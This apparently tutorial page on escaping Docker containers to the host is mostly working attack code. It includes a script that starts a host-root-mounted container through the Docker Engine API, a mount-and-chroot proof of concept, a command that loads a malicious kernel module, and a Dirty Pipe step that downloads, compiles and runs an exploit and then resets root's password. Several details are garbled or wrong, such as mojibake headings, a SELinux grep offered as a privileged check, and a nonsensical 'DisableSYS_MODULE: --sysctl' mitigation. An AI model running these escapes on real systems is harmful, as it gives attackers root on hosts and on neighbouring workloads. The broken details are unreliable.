🧠 Description

Container escape techniques let an attacker who already runs code inside a Docker container break out of its isolation and act on the underlying host. Containers share the host kernel, so once that boundary falls the attacker holds the host's privileges, and a single vulnerable workload becomes a full node compromise.

Why Container Escape is Critical:
  • Full host system access from inside the container
  • Access to every other container on the same host
  • Cluster-wide compromise through the node's own credentials
  • Secret extraction from the host filesystem
  • Persistence on the infrastructure rather than in a disposable container

🔌 Docker Socket Escape

The Docker Socket:

Anything that can write to /var/run/docker.sock talks to the Docker daemon, which runs as root on the host. A container with the socket mounted can therefore ask the daemon to start a new container with the host root filesystem bound into it. No vulnerability is involved; this is the daemon doing exactly what it is for.

# Check if the docker socket is mounted (and writable by us)
ls -la /var/run/docker.sock

# If mounted and a docker CLI is available, escape to the host:
# start a sibling container with host / bound at /host and chroot into it
docker run -it -v /:/host alpine chroot /host sh

# Without a CLI, the same Engine API is reachable with curl --unix-socket

Alternative Sockets:

# Check for other sockets (other runtime sockets give the same level of access)
find / -name '*.sock' -type s 2>/dev/null

# containerd socket (driven with ctr --address, or any client of the containerd API)
ls -la /run/containerd/containerd.sock

# crio socket (driven with crictl --runtime-endpoint)
ls -la /var/run/crio/crio.sock
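The socket escape above written as a script, as an added example (not code from the original page): it enumerates runtime sockets and, when the Docker socket is writable, drives the Engine API with curl so the technique works in slim images that ship no docker CLI. It assumes curl is present in the container, that the daemon already has the image named in IMAGE (pulling would need network access), and the socket path in DOCKER_SOCK; the proof-file path /tmp/escaped-from-container is an arbitrary choice.

```sh
#!/bin/sh
# Added example: Docker socket escape through the Engine API, no docker CLI needed.
# Assumptions: curl available, IMAGE already present on the host daemon.

DOCKER_SOCK="${DOCKER_SOCK:-/var/run/docker.sock}"
IMAGE="${IMAGE:-alpine}"

# probe_socket PATH -> 0 usable unix socket, 1 exists but not a writable socket, 2 absent
probe_socket() {
    [ -e "$1" ] || return 2
    [ -S "$1" ] && [ -w "$1" ] || return 1
}

# find_runtime_sockets [DIR...] -> docker/containerd/cri-o sockets under DIR (default /var/run /run)
find_runtime_sockets() {
    [ $# -gt 0 ] || set -- /var/run /run
    find "$@" -maxdepth 3 -type s \
        \( -name docker.sock -o -name containerd.sock -o -name crio.sock \) 2>/dev/null
}

# api METHOD PATH [JSON] -> raw response body from the Engine API over the socket
api() {
    if [ -n "${3:-}" ]; then
        curl -s --unix-socket "$DOCKER_SOCK" -X "$1" \
            -H 'Content-Type: application/json' -d "$3" "http://localhost$2"
    else
        curl -s --unix-socket "$DOCKER_SOCK" -X "$1" "http://localhost$2"
    fi
}

# create_payload -> body for POST /containers/create: bind host / at /host, chroot into
# it and leave a proof file on the host (same idea as `docker run -v /:/host alpine
# chroot /host sh`, minus the interactive tty, which the API cannot give us from curl)
create_payload() {
    printf '{"Image":"%s","Cmd":["chroot","/host","sh","-c","id > /tmp/escaped-from-container"],' "$IMAGE"
    printf '"HostConfig":{"Binds":["/:/host"]}}'
}

# escape_via_api -> creates and starts the container, prints its id; returns 1 on failure
escape_via_api() {
    probe_socket "$DOCKER_SOCK" || { echo "no usable socket at $DOCKER_SOCK" >&2; return 1; }
    api GET /version | grep -q '"ApiVersion"' || { echo "daemon did not answer" >&2; return 1; }
    id=$(api POST /containers/create "$(create_payload)" | sed -n 's/.*"Id":"\([0-9a-f]*\)".*/\1/p')
    [ -n "$id" ] || { echo "create failed (is $IMAGE present on the host?)" >&2; return 1; }
    api POST "/containers/$id/start" >/dev/null
    echo "$id"
}

case "${1:-}" in
    scan)   find_runtime_sockets ;;
    escape) escape_via_api ;;
esac
```

Run it with `scan` first; `escape` only does anything when probe_socket succeeds. If the proof file appears in the host's /tmp, the daemon executed the chroot for you, and an interactive shell is one `docker run -it` (or an API attach) away.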

🏠 Shared Namespace Escape

Host Network Namespace Access:

A container started with --network=host (hostNetwork: true in Kubernetes) has no network namespace of its own: it sees the host's interfaces and can reach services the host binds to loopback only, which are never exposed on the pod network.

# Check the network namespace: a normal container sees only lo and eth0;
# host-only interfaces such as docker0 or a bridge mean the namespace is shared
ip addr
readlink /proc/self/ns/net

# Services bound to the host loopback are reachable directly
ss -ltnp

# Port scanning from the host's network position
nmap -sV 10.0.0.1/24

PID Namespace Escape:

With --pid=host (hostPID: true) the container sees every host process. /proc/<pid>/root of a host process is a view of that process's root filesystem, so if the kernel's ptrace access check lets us through (container uid 0 matching the target's uid and no LSM policy in the way, or CAP_SYS_PTRACE) the host filesystem is readable and writable through /proc/1/root without mounting anything.

# If the PID namespace is not isolated, PID 1 is the host's init, not the container entrypoint
tr '\0' ' ' < /proc/1/cmdline
ps aux

# Write to the host filesystem through init's root directory
ls /proc/1/root/
echo "malicious_code" > /proc/1/root/tmp/payload.sh

👑 CAP_SYS_ADMIN Exploit

Check Capabilities:

CAP_SYS_ADMIN is the catch-all capability: it permits mount(2) and most other operations the kernel never gave a capability of their own. Docker does not grant it by default; it appears when someone adds --cap-add SYS_ADMIN or runs the container --privileged.

# Check current capabilities (CapEff is the effective set; decode the hex mask)
grep Cap /proc/self/status
capsh --print
capsh --decode=$(awk '/CapEff/ {print $2}' /proc/self/status)

# If CAP_SYS_ADMIN is present, try to mount the host's root block device
# (find it with lsblk or cat /proc/partitions; /dev/sda1 below is an assumption)
mkdir -p /tmp/c
mount /dev/sda1 /tmp/c
chroot /tmp/c

The mount only succeeds if the device is reachable. A non-privileged container's device cgroup denies read access to host block devices even when CAP_SYS_ADMIN and CAP_MKNOD are held, so on a default Docker setup the mount fails with "Operation not permitted"; with --privileged the device restriction is lifted and /dev is populated with the host's devices.

Proof of Concept:

#!/bin/bash
# Container escape via CAP_SYS_ADMIN (plus CAP_MKNOD, which Docker grants by default).
# Assumes the host root filesystem is /dev/sda1, i.e. block device 8:1; confirm
# with cat /proc/partitions or lsblk on the target first.

# Create the block device node ourselves in case /dev inside the container lacks it
mkdir -p /tmp/hostdir
mknod -m 600 /tmp/hostdev b 8 1 2>/dev/null

# Mount the host filesystem (fails with EPERM if the device cgroup blocks the device)
mount /tmp/hostdev /tmp/hostdir 2>/dev/null

# If successful, chroot to host
if [ -d "/tmp/hostdir/etc" ]; then
    chroot /tmp/hostdir /bin/bash
fi

πŸ“ Privileged Container / Volume Mount

Check if Privileged:

# Check privileged status
cat /proc/self/status | grep SeLinux
dmesg | grep -i security

# Try to mount
mount /dev/sda1 /tmp/escape 2>&1
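Both the CAP_SYS_ADMIN check above and the privileged check here come down to reading the CapEff mask, so here is one added example that does it properly (my code, not the page's): a POSIX sh decoder that lists the capabilities in a mask, flags the ones that make an escape likely, and tells a full --privileged set from Docker's default set. The bit numbers are the kernel's own; the DANGEROUS list is my selection, and the namespace hints in triage() are heuristics.

```sh
#!/bin/sh
# Added example: decode CapEff, flag escape-relevant capabilities, detect --privileged.
# Bit numbers follow include/uapi/linux/capability.h (0 = chown ... 40 = checkpoint_restore).

CAP_NAMES="chown dac_override dac_read_search fowner fsetid kill setgid setuid \
setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock \
ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot \
sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control \
setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read perfmon \
bpf checkpoint_restore"

# Capabilities that turn a foothold into host access (mount, modules, ptrace,
# raw disk I/O, reading any file, host network control, kernel BPF). My selection.
DANGEROUS="sys_admin sys_module sys_ptrace sys_rawio dac_read_search net_admin bpf perfmon"

# has_cap HEXMASK BIT -> 0 if that bit is set in the mask
has_cap() {
    [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# cap_names HEXMASK -> names of the set bits, one per line
cap_names() {
    bit=0
    for name in $CAP_NAMES; do
        has_cap "$1" "$bit" && echo "$name"
        bit=$((bit + 1))
    done
}

# dangerous_caps HEXMASK -> the subset of cap_names that is in DANGEROUS
dangerous_caps() {
    for name in $(cap_names "$1"); do
        case " $DANGEROUS " in *" $name "*) echo "$name" ;; esac
    done
}

# is_full_capset HEXMASK [LAST_CAP] -> 0 if every capability up to LAST_CAP is set;
# LAST_CAP defaults to the running kernel's /proc/sys/kernel/cap_last_cap
is_full_capset() {
    last=${2:-$(cat /proc/sys/kernel/cap_last_cap 2>/dev/null || echo 40)}
    [ $(( 0x$1 )) -eq $(( (1 << (last + 1)) - 1 )) ]
}

# eff_mask [PID] -> the CapEff field of /proc/PID/status (default: this process)
eff_mask() {
    awk '/^CapEff:/ { print $2 }' "/proc/${1:-self}/status"
}

# triage -> summarise this process's position, with shared-namespace hints
triage() {
    mask=$(eff_mask)
    echo "CapEff: $mask"
    if is_full_capset "$mask"; then
        echo "full capability set: looks like --privileged"
    elif [ -n "$(dangerous_caps "$mask")" ]; then
        echo "escape-relevant capabilities: $(dangerous_caps "$mask" | tr '\n' ' ')"
    else
        echo "no escape-relevant capabilities (check sockets and volume mounts instead)"
    fi
    # Heuristic for --pid=host: PID 1 is a host init rather than the container entrypoint
    case "$(tr '\0' ' ' < /proc/1/cmdline 2>/dev/null)" in
        *systemd*|*/sbin/init*) echo "PID 1 is a host init: PID namespace looks shared" ;;
    esac
    # Heuristic for --network=host: a host-only interface such as docker0 is visible
    [ -e /sys/class/net/docker0 ] && echo "docker0 visible: network namespace looks shared"
    true
}

case "${1:-}" in
    triage) triage ;;
esac
```

`sh caps.sh triage` inside a container gives the summary; `cap_names 00000000a80425fb` lists Docker's 14 default capabilities, and a mask with all bits up to cap_last_cap set is what --privileged looks like.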

Host Rootfs Mount:

# If the host / was bind-mounted into the container as a volume (e.g. -v /:/host),
# it shows up among the device-backed mounts and no mount call is needed: just chroot
cat /proc/1/mounts | grep -E "^/dev"
chroot /host /bin/bash

# Otherwise, when the host block device is reachable (--privileged), mount the host
# root yourself (/dev/sda1 is an assumption; check cat /proc/partitions)
mkdir -p /tmp/host
mount /dev/sda1 /tmp/host
chroot /tmp/host /bin/bash

Load Kernel Module:

Kernel modules are not namespaced: a module loaded from inside a container runs in the host kernel with full access to everything. Loading one needs CAP_SYS_MODULE (bit 16), which --privileged includes, and a kernel that still accepts modules (modules_disabled = 0, plus a valid signature if signature enforcement or lockdown is on).

# Check if /sys is writable: read-only in a normal container, read-write with --privileged
grep ' /sys ' /proc/self/mounts
ls -la /sys/module

# Check whether module loading is possible at all
cat /proc/sys/kernel/modules_disabled            # 1 = kernel accepts no further modules
cat /sys/module/module/parameters/sig_enforce    # Y = unsigned modules are rejected

# Load a malicious module (hidden.ko is a placeholder; it must be built against the
# host's exact kernel and signed with a trusted key if signature enforcement is on)
insmod /tmp/hidden.ko

# Once loaded, the module's parameters are reachable through sysfs
echo "1" > /sys/module/hidden/parameters/visible

βš™οΈ Cgroups Escape (Dirty Pipe)

Dirty Pipe Exploitation:

# Check kernel version
uname -r

# Dirty pipe exploit (CVE-2022-0847)
wget https://exploit-db.com/dirty-pipe.c
gcc dirty-pipe.c -o dirty-pipe
./dirty-pipe /etc/passwd 1

# Now write to any file as root
echo "root:password" | chpasswd
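The "check kernel version" step is the one place a triage script can help before anything is compiled, so here is an added example (mine, not from the page) that classifies a uname -r string against the CVE-2022-0847 window: introduced in 5.8, fixed in 5.10.102, 5.15.25, 5.16.11 and everything from 5.17 on. The version series between those stable branches (5.11 to 5.14, 5.9) never received an upstream fix because they were end-of-life, so they are treated as vulnerable. The vendor-backport caveat from above still applies: "in window" means "worth testing", not "confirmed".

```sh
#!/bin/sh
# Added example: classify a kernel version string against the Dirty Pipe window.
# Known range: >= 5.8 and < 5.10.102 / < 5.15.25 / < 5.16.11 / < 5.17 (Max Kellermann's
# writeup); distribution backports are invisible here, so treat the result as a hint.

# vernum VERSION -> major*1000000 + minor*1000 + patch, ignoring any -suffix
# "5.10.101-generic" -> 5010101, "6.1" -> 6001000
vernum() {
    base=${1%%[!0-9.]*}                 # keep only the leading digits-and-dots part
    oldifs=$IFS; IFS=.; set -- $base; IFS=$oldifs
    echo $(( ${1:-0} * 1000000 + ${2:-0} * 1000 + ${3:-0} ))
}

# dirty_pipe_window VERSION -> 0 if the version lies in the known-vulnerable range
dirty_pipe_window() {
    n=$(vernum "$1")
    [ "$n" -ge 5008000 ] || return 1            # bug introduced in 5.8
    case "$1" in
        5.10.*) [ "$n" -lt 5010102 ] ;;         # fixed in 5.10.102
        5.15.*) [ "$n" -lt 5015025 ] ;;         # fixed in 5.15.25
        5.16.*) [ "$n" -lt 5016011 ] ;;         # fixed in 5.16.11
        *)      [ "$n" -lt 5017000 ] ;;         # other 5.8..5.16 series: EOL, never fixed; 5.17+ fixed
    esac
}

# check_running_kernel -> prints a verdict for uname -r, returns 0 when in window
check_running_kernel() {
    k=$(uname -r)
    if dirty_pipe_window "$k"; then
        echo "$k: inside the CVE-2022-0847 window (verify, vendor may have backported the fix)"
        return 0
    fi
    echo "$k: outside the CVE-2022-0847 window"
    return 1
}

case "${1:-}" in
    check) check_running_kernel ;;
    "")    ;;
    *)     dirty_pipe_window "$1" && echo "$1: in window" || echo "$1: not in window" ;;
esac
```

`sh dirtypipe-check.sh check` tests the running kernel; passing a version string instead checks that string, which is handy for triaging a fleet from an inventory file.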

💥 Impact

  • Root access on host system
  • Access to all containers on the node
  • Kubernetes secret extraction
  • Node-to-cluster lateral movement
  • Data exfiltration from other workloads

πŸ›‘οΈ Mitigation

βœ… Defense Strategies:
  • Don't run containers as privileged
  • Drop all capabilities: --cap-drop ALL
  • Read-only root filesystem: --read-only
  • DisableSYS_MODULE: --sysctl
  • Use non-root users in containers
  • Regular CVE patching

Secure Container Config:

docker run --read-only \
            --cap-drop ALL \
            --security-opt=no-new-privileges \
            --user 65534:65534 \
            --network=none \
            alpine:latest